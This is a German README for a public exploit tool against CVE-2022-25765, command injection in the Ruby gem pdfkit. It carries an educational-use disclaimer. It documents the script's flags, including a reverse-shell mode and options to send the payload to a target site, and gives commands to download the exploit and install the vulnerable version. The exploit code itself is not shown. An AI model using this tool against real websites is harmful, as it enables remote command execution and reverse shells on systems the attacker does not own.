
Exploit für CVE-2022–25765 (pdfkit) - Befehlseinschleusung

Gefällt dir dieses Repo? Gib uns einen ⭐!
Nur für Bildungszwecke und autorisierte Sicherheitsforschung.
@UNICORDev von (@NicPWNs und @Dev-Yeoj)
Das Paket pdfkit ab Version 0.0.0 ist anfällig für Command Injection, da die URL nicht ordnungsgemäß bereinigt wird.
Ein Ruby-Gem pdfkit wird häufig verwendet, um Webseiten oder HTML in PDF-Dokumente zu konvertieren. Anfällige Versionen (< 0.8.7.2) dieser Software können eine speziell präparierte URL übergeben bekommen, die einen auszuführenden Befehl enthält. Dieser Exploit erzeugt ausführbare URLs oder sendet sie an eine anfällige Website, die pdfkit verwendet.
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h
-c Benutzerdefinierter Befehlsmodus. Befehl angeben, um benutzerdefiniertes Payload zu generieren.
-s Reverse-Shell-Modus. Geben Sie die lokale IP und den Port an, um das Reverse-Shell-Payload zu generieren.
-w URL der Website, die die anfällige Version von pdfkit ausführt. (Optional)
-p POST-Parameter auf der Website, die die anfällige Version von pdfkit ausführt. (Optional)
-h Zeigt dieses Hilfemenü an.
exploit-CVE-2022-25765.py von GitHub herunterladen
exploit-CVE-2022-25765.py von ExploitDB herunterladen
searchsploit -u
searchsploit -m 51293


pdfkit Version 0.8.6
pdfkit Versionen < 0.8.7.2
gem install pdfkit -v 0.8.6